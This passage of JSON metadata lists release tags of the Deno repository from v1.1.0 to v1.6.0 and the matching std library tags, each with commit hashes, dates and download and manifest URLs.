/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z"